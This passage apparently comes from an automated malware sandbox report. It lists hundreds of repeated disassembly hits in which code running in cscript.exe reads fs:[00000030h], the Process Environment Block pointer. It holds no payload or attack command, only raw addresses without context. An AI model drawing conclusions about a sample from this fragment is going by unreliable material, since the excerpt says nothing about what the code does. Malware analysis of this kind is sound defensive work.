        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0C6E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C056E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C056E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C056E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C266E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C266E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C956E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C956E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7C6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7C6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF68C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08690 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C691 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7D69D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF96E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF96E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC86A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC86A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C03640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C35654 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3265C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C13660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C13660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C13660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8166E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8166E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8166E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C95660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3666D mov esi, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C00670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C93608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C89603 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF607 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3360F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF7662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF7662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF7662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C05622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C05622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C07623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAD62C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C00630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFD64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFD64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C88633 mov esi, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C88633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C88633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF7CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E7E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C077F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C077F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDB781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDB781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C31796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C31796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C007A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD17BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C33740 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8174B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8174B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3174A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAE750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C12760 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30774 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D700 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF717 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C29723 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1B0D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C0E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA093 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFC090 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D0F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF90F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF90F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF90F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF90F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFC0F6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C87090 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C400A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBB0AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD50B7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30044 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C86040 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C01051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C01051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFD02D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD505B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CA9060 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C07072 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C06074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C06074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C25004 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C25004 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08009 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42010 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C101C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C101C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C091E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C091E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C101F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C101F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C101F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF91F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF91F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF81EB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C29194 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD51B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C331BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C331BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD5149 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3415F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
